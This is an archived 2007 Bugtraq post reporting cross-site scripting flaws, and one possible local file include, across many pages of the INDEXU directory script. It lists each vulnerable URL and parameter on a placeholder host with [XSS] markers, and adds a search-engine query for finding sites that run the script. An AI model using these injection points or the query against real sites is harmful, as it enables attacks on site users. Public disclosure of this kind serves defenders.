lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070116195152.23071.qmail@securityfocus.com> Date: 16 Jan 2007 19:51:52 -0000 From: gamr-14@...mail.com To: bugtraq@...urityfocus.com Subject: vulnerability script indexu all versions vulnerability script indexu all versions Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn TeaM AL-GaRNi Application : indexu version : all versions URL : http://www.nicecoder.com/ google : "Powered by INDEXU 5." Exploits : |//1\\| in upgrade.php http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #../index.php AND Local File Include~ ########################## |//2\\| in suggest_category.php http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS] ########################## |//3\\| in user_detail.php http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS] ########################## |//4\\| in tell_friend.php http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS] ########################## |//5\\| in sendmail.php http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS] ########################## //6\\ in send_pwd.php http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS] http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS] ########################## |//7\\| in search.php http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS] ########################## |//8\\| http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/register.php?username=[XSS] http://www.site.com/INDEXU_PATH/register.php?password=[XSS] http://www.site.com/INDEXU_PATH/register.php?password2=[XSS] http://www.site.com/INDEXU_PATH/register.php?email=[XSS] ########################## |//9\\| power_search.php http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS] http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS] http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS] ########################## |//10\\| in new.php http://www.site.com/INDEXU_PATH/new.php?path=[XSS] http://www.site.com/INDEXU_PATH//new.php?total=[XSS] ########################## |//11\\| in modify.php http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS] ########################## |//12\\| in mailing_list.php http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS] ########################## |//13\\| in login.php http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS] ########################## |//...$...\\| There is another vulnerability in the program, a XSS ::::::::::::::::::::::::::::::::: :: ########### ########### :: :: ########### ########### :: :: ### ### ### :: :: ### ########### :: :: ### ###### ########### :: :: ### ## ### == ### ### :: :: ### ### == ### ### :: :: ############ ### ### :: :: ############ ### ### :: ::::::::::::::::::::::::::::::::: ########################## #####gamr-14@...mail.com## #####Error@....com######## ########(c)2007###########